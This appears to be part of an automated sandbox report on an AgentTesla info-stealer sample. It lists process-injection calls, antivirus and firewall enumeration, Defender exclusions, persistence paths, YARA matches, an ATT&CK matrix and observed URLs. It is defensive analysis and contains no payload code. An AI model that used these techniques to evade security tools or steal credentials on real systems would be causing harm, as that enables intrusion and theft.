                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Users\user\Desktop\lKJbVguaav.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exeCode function: 7_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,7_2_0040A272
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0.0.lKJbVguaav.exe.40e7fb8.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.lKJbVguaav.exe.40c7f98.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.lKJbVguaav.exe.40e7fb8.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.412278595.00000000040B0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.413222827.0000000004128000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: lKJbVguaav.exe PID: 6396, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0.0.lKJbVguaav.exe.40e7fb8.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.lKJbVguaav.exe.40c7f98.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.lKJbVguaav.exe.40e7fb8.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.412278595.00000000040B0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.413222827.0000000004128000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: lKJbVguaav.exe PID: 6396, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation331Startup Items1Startup Items1Disable or Modify Tools111Input Capture1File and Directory Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1Application Shimming1Exploitation for Privilege Escalation1Deobfuscate/Decode Files or Information11LSASS MemorySystem Information Discovery134Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothApplication Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsCommand and Scripting Interpreter1Windows Service1Application Shimming1Obfuscated Files or Information2Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsService Execution2Registry Run Keys / Startup Folder221Access Token Manipulation1Timestomp1NTDSSecurity Software Discovery551Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptWindows Service1Masquerading113LSA SecretsVirtualization/Sandbox Evasion461SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonProcess Injection12Virtualization/Sandbox Evasion461Cached Domain CredentialsProcess Discovery3VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsRegistry Run Keys / Startup Folder221Access Token Manipulation1DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection12Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 483912 Sample: lKJbVguaav Startdate: 15/09/2021 Architecture: WINDOWS Score: 100 95 canonicalizer.ucsuri.tcs 2->95 97 Found malware configuration 2->97 99 Multi AV Scanner detection for dropped file 2->99 101 Sigma detected: Powershell adding suspicious path to exclusion list 2->101 103 11 other signatures 2->103 9 lKJbVguaav.exe 9 11 2->9         started        13 svchost.exe 2->13         started        15 7ADA33B7.exe 2->15         started        17 11 other processes 2->17 signatures3 process4 dnsIp5 77 C:\Users\user\AppData\...\7ADA33B7.exe, PE32 9->77 dropped 79 C:\Program Files\Common Files\...\svchost.exe, PE32 9->79 dropped 81 C:\Users\...\7ADA33B7.exe:Zone.Identifier, ASCII 9->81 dropped 89 2 other files (1 malicious) 9->89 dropped 111 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 9->111 113 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 9->113 115 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 9->115 119 4 other signatures 9->119 20 7ADA33B7.exe 9->20         started        24 WerFault.exe 9->24         started        32 10 other processes 9->32 83 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 13->83 dropped 117 Adds a directory exclusion to Windows Defender 13->117 26 powershell.exe 13->26         started        28 powershell.exe 13->28         started        34 4 other processes 13->34 85 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 15->85 dropped 36 6 other processes 15->36 91 127.0.0.1 unknown unknown 17->91 93 192.168.2.1, 274 unknown unknown 17->93 87 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 17->87 dropped 30 powershell.exe 17->30         started        38 7 other processes 17->38 file6 signatures7 process8 file9 73 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 20->73 dropped 105 Adds a directory exclusion to Windows Defender 20->105 40 powershell.exe 20->40         started        49 5 other processes 20->49 75 C:\ProgramData\Microsoft\...\Report.wer, Little-endian 24->75 dropped 107 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 26->107 43 conhost.exe 26->43         started        45 conhost.exe 28->45         started        47 conhost.exe 30->47         started        51 9 other processes 32->51 53 4 other processes 34->53 55 6 other processes 36->55 57 4 other processes 38->57 signatures10 process11 signatures12 109 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 40->109 59 conhost.exe 40->59         started        61 conhost.exe 49->61         started        63 conhost.exe 49->63         started        65 conhost.exe 49->65         started        67 conhost.exe 49->67         started        69 AdvancedRun.exe 51->69         started        71 conhost.exe 53->71         started        process13

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      lKJbVguaav.exe62%VirustotalBrowse
                      lKJbVguaav.exe34%MetadefenderBrowse
                      lKJbVguaav.exe67%ReversingLabsWin32.Trojan.AgentTesla
                      lKJbVguaav.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Program Files\Common Files\system\E59A6148\svchost.exe100%Joe Sandbox ML
                      C:\Program Files\Common Files\system\E59A6148\svchost.exe62%VirustotalBrowse
                      C:\Program Files\Common Files\system\E59A6148\svchost.exe34%MetadefenderBrowse
                      C:\Program Files\Common Files\system\E59A6148\svchost.exe67%ReversingLabsWin32.Trojan.AgentTesla
                      C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\AdvancedRun.exe0%VirustotalBrowse
                      C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\AdvancedRun.exe3%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\19b25a48-953e-448c-9e64-5dc032452e45\AdvancedRun.exe0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exe3%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\5bb2c36b-9ef3-485f-8cd6-e02fb42d70a2\AdvancedRun.exe0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\AdvancedRun.exe3%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\6b30eb02-4ddc-4526-af49-69f73f778fc3\AdvancedRun.exe0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exe3%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\74756a05-3a9e-4a94-ac38-fe701c90e011\AdvancedRun.exe0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\AdvancedRun.exe3%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\a917f366-d607-4eab-84c4-b148dd5c0b83\AdvancedRun.exe0%ReversingLabs
                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe34%MetadefenderBrowse
                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe67%ReversingLabsWin32.Trojan.AgentTesla

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://www.davidemauri.it/0%VirustotalBrowse
                      http://www.davidemauri.it/0%Avira URL Cloudsafe
                      http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
                      https://sectigo.com/CPS0C0%URL Reputationsafe
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://sectigo.com/CPS00%URL Reputationsafe
                      http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y0%URL Reputationsafe
                      https://dynamic.t0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      canonicalizer.ucsuri.tcs
                      		unknown
                      		unknownfalse
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0lKJbVguaav.exefalse
                        • URL Reputation: safe
                        		unknown
                        http://ocsp.sectigo.com0lKJbVguaav.exefalse
                        • URL Reputation: safe
                        		unknown
                        https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 0000000A.00000002.310085265.0000020E98A3D000.00000004.00000001.sdmpfalse
                          		high
                          https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000000A.00000003.309177070.0000020E98A61000.00000004.00000001.sdmpfalse
                            		high
                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000000A.00000002.310085265.0000020E98A3D000.00000004.00000001.sdmpfalse
                              		high
                              https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 0000000A.00000002.310120078.0000020E98A4B000.00000004.00000001.sdmpfalse
                                		high
                                https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 0000000A.00000002.310133862.0000020E98A56000.00000004.00000001.sdmpfalse
                                  		high
                                  https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 0000000A.00000003.309177070.0000020E98A61000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.davidemauri.it/lKJbVguaav.exefalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#lKJbVguaav.exefalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000000A.00000003.309267797.0000020E98A40000.00000004.00000001.sdmpfalse
                                      		high
                                      http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#lKJbVguaav.exe, 00000000.00000000.411197711.0000000004011000.00000004.00000001.sdmp, AdvancedRun.exe.37.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 0000000A.00000003.309177070.0000020E98A61000.00000004.00000001.sdmpfalse
                                        		high
                                        https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 0000000A.00000003.309250286.0000020E98A49000.00000004.00000001.sdmpfalse
                                          		high
                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 0000000A.00000003.285561221.0000020E98A30000.00000004.00000001.sdmpfalse
                                            		high
                                            https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 0000000A.00000003.309267797.0000020E98A40000.00000004.00000001.sdmpfalse
                                              		high
                                              https://sectigo.com/CPS0ClKJbVguaav.exe, 00000000.00000000.411197711.0000000004011000.00000004.00000001.sdmp, AdvancedRun.exe.37.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://sectigo.com/CPS0DlKJbVguaav.exe, 00000000.00000000.411197711.0000000004011000.00000004.00000001.sdmp, AdvancedRun.exe.37.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://appexmapsappupdate.blob.core.windows.netsvchost.exe, 0000000A.00000003.309177070.0000020E98A61000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.nirsoft.net/AdvancedRun.exe, AdvancedRun.exe, 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002B.00000002.440495695.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002C.00000002.445188545.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002D.00000000.435782596.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002E.00000002.439972142.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002F.00000000.439981519.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000030.00000002.454809675.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000033.00000002.448405509.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000034.00000000.450460932.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.37.drfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namelKJbVguaav.exe, 00000000.00000000.373585257.0000000003011000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.bingmapsportal.comsvchost.exe, 0000000A.00000002.309975982.0000020E98A24000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziplKJbVguaav.exe, 00000000.00000000.412278595.00000000040B0000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000A.00000002.310085265.0000020E98A3D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.285561221.0000020E98A30000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 0000000A.00000003.309177070.0000020E98A61000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://sectigo.com/CPS0lKJbVguaav.exefalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 0000000A.00000003.309289255.0000020E98A45000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://regexlib.com/lKJbVguaav.exefalse
                                                              		high
                                                              https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 0000000A.00000002.310085265.0000020E98A3D000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 0000000A.00000003.285561221.0000020E98A30000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 0000000A.00000003.285561221.0000020E98A30000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#lKJbVguaav.exefalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 0000000A.00000002.310120078.0000020E98A4B000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.309267797.0000020E98A40000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0slKJbVguaav.exe, 00000000.00000000.411197711.0000000004011000.00000004.00000001.sdmp, AdvancedRun.exe.37.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 0000000A.00000002.310085265.0000020E98A3D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.309975982.0000020E98A24000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000A.00000002.310133862.0000020E98A56000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 0000000A.00000003.309177070.0000020E98A61000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000A.00000003.285561221.0000020E98A30000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 0000000A.00000003.309177070.0000020E98A61000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tlKJbVguaav.exe, 00000000.00000000.411197711.0000000004011000.00000004.00000001.sdmp, AdvancedRun.exe.37.drfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 0000000A.00000002.310120078.0000020E98A4B000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000A.00000002.310120078.0000020E98A4B000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0ylKJbVguaav.exefalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://dynamic.tsvchost.exe, 0000000A.00000003.309164637.0000020E98A64000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#lKJbVguaav.exe, 00000000.00000000.411197711.0000000004011000.00000004.00000001.sdmp, AdvancedRun.exe.37.drfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000000A.00000003.309177070.0000020E98A61000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 0000000A.00000002.310062042.0000020E98A39000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://www.sourceforge.net/projects/regextestkhttp://www.codeproject.com/KB/cs/dotnetregextest.aspx_lKJbVguaav.exefalse
                                                                                          		high
                                                                                          https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000000A.00000002.310120078.0000020E98A4B000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 0000000A.00000003.309177070.0000020E98A61000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000A.00000002.310120078.0000020E98A4B000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 0000000A.00000003.309250286.0000020E98A49000.00000004.00000001.sdmpfalse
                                                                                                  		high

                                                                                                  Contacted IPs

                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs

                                                                                                  Public

                                                                                                  IPDomainCountryFlagASNASN NameMalicious

                                                                                                  Private

                                                                                                  IP
                                                                                                  192.168.2.1
                                                                                                  127.0.0.1

                                                                                                  General Information

                                                                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                                                                  Analysis ID:483912
                                                                                                  Start date:15.09.2021
                                                                                                  Start time:16:10:16
                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                  Overall analysis duration:0h 15m 38s
